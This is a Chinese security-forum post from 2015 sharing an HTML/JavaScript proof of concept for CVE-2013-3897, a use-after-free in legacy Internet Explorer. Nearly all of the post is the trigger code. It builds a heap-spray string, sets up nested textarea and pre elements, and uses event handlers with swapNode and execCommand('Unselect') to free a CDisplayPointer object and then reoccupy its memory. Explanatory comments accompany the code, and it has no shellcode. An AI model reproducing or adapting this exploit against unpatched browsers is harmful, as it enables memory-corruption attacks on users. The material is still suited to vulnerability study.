[分享]CVE-2013-3897漏洞poc
发表于:
2015-5-23 11:24
<html>
<head>
<script>
// Builds the string that the spray loops below assign to element className.
// Layout: 17 iterations of two UTF-16 code units; every iteration appends 0x4141 0x4141
// ("AAAA" filler) except iteration 7, which appends 0x2020 0x2030 via unescape("%u2020%u2030").
// One trailing 0x4141 is added afterwards, so the string is 17*2 + 1 = 35 UTF-16 code units long.
// NOTE(review): `i` is assigned without var/let and therefore becomes an implicit global that is
// also reused by the loops in butterfly() and fun_onpropertychange().
// NOTE(review): the only non-filler code units are the pair at iteration 7; their significance
// is not shown anywhere in this file — TODO confirm against the author's analysis.
var data = "";
for (i=0; i<17; i++)
{
if (i==7)
{
data += unescape("%u2020%u2030");
// The commented-out line below would have made iteration 7 plain filler like the others.
//data += "\u4141\u4141";
}
else
{
data += "\u4141\u4141";
}
}
data += "\u4141";
// Creates 20 detached <div> elements and assigns the prebuilt `data` string to each className.
// The elements are never appended to the document and the local reference is dropped on each
// iteration, so the only effect is the allocation itself.
// NOTE(review): this function is not called in this file — the call in kaiju() is commented out.
// NOTE(review): the loop counter `i` is the implicit global shared with the top-level loop.
function butterfly()
{
for(i=0; i<20; i++)
{
var effect = document.createElement("div");
effect.className = data;
}
}
// Shared state for the two event handlers below.
// battleStation: false until fun_onpropertychange() has run once; its second invocation
//                performs the allocation and className assignment loops.
// war:           array of <span> elements created in fun_onpropertychange().
// godzilla:      the <textarea> created in kaiju().
// minilla:       the <pre> created in kaiju() and nested inside godzilla.
var battleStation = false;
var war = new Array();
var godzilla ;
var minilla ;
// NOTE(review): duplicate declaration of battleStation (already declared above); with `var`
// this is legal and harmless, but one of the two lines is redundant.
var battleStation = false;
// select handler installed on the <textarea> (godzilla) in kaiju().
// The Math.atan2(0x999, "...") calls have no effect on control flow; the string arguments read
// as trace markers, presumably so that a debugger breakpoint on atan2 shows progress — verify.
// NOTE(review): swapNode is a legacy, IE-only DOM method; on other engines this line throws.
function fun_onselect()
{
Math.atan2(0x999, "[*] Before swapNode");
minilla.swapNode(document.createElement("div")); // Per the author: swapNode exchanges the nodes, which removes the textarea from the page layout and in turn fires the onpropertychange event.
Math.atan2(0x999, "[*] After swapNode");
}
// fun_onpropertychange第一次被调用时是因为改变了DOM,第二次调用是由swapNode导致的,立即进行内存占位
// onpropertychange handler installed on the <textarea> (godzilla) in kaiju().
// Per the author's comment above this function, it runs twice: first because the DOM was
// modified, second because of the swapNode call in fun_onselect(). The first run only flips
// battleStation to true; the second run (battleStation already true) allocates 50 <span>
// elements, issues document.execCommand("Unselect"), then assigns `data` as className on each span.
// NOTE(review): the author's comments state that "Unselect" releases the CDisplayPointer object
// and that the className loop is meant to reoccupy that freed memory — i.e. this handler is where
// the CVE-2013-3897 use-after-free condition is exercised. That claim is not verifiable from this
// file alone. onpropertychange and execCommand("Unselect") are legacy IE-only APIs, so the code
// is inert on modern engines; the vendor fix for the CVE is the relevant mitigation.
// NOTE(review): the loop counter `i` is the implicit global shared with the other loops.
function fun_onpropertychange()
{
Math.atan2(0x999, "[*] Enter onpropertychange");
if (battleStation == true)
{
for (i=0; i<50; i++)
{
war.push(document.createElement("span"));
}
}
Math.atan2(0x999, "[*] Before Unselect");
document.execCommand("Unselect"); // Per the author: document.execCommand("Unselect") undoes the select, which causes the CDisplayPointer object to be freed.
Math.atan2(0x999, "[*] After Unselect");
if (battleStation == true) // Per the author: reoccupy the memory of the already freed CDisplayPointer.
{
for (i=0; i < war.length; i++)
{
war[i].className = data;
}
}
else
{
// First invocation: only arm the second pass.
battleStation = true;
}
Math.atan2(0x999, "[*] Leave onpropertychange");
}
// Entry point, run from <body onload>.
// Builds the DOM arrangement the two handlers rely on: a <textarea> (godzilla) containing a
// <pre> (minilla), installs fun_onselect and fun_onpropertychange on the textarea, then calls
// godzilla.select() to start the event sequence.
// NOTE(review): appending minilla to the body and then to godzilla moves it — after line
// `godzilla.appendChild(minilla)` it is a child of the textarea, not of the body.
// NOTE(review): the butterfly() call is commented out, so no pre-allocation happens here.
function kaiju()
{
godzilla = document.createElement("textarea"); // Create a CTextArea Object
minilla = document.createElement("pre");
document.body.appendChild(godzilla);
document.body.appendChild(minilla);
godzilla.appendChild(minilla);
godzilla.onselect = fun_onselect ; // Install the select handler on the textarea; it fires when the textarea's text is selected.
Math.atan2(0x999, "[*] Before godzilla.onpropertychange");
godzilla.onpropertychange = fun_onpropertychange ; // Install the onpropertychange handler on the textarea; it fires when a property changes.
Math.atan2(0x999, "[*] After godzilla.onpropertychange");
//butterfly();
Math.atan2(0x999, "[*] Before godzilla.select()");
godzilla.select(); // Explicitly trigger the select handler.
Math.atan2(0x999, "[*] After godzilla.select()");
}
</script>
</head>
<body onload='kaiju()'>
</body>
</html>
链接来自
07cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3y4F1j5X3I4G2k6%4y4Q4x3X3g2U0L8$3#2Q4x3V1k6p5j5h3&6F1P5g2)9J5k6q4N6W2K9g2)9J5c8Y4m8Q4x3V1j5K6y4K6j5$3x3K6j5J5i4K6u0W2K9s2c8E0L8l9`.`.
先保存下来,后续更新研究分析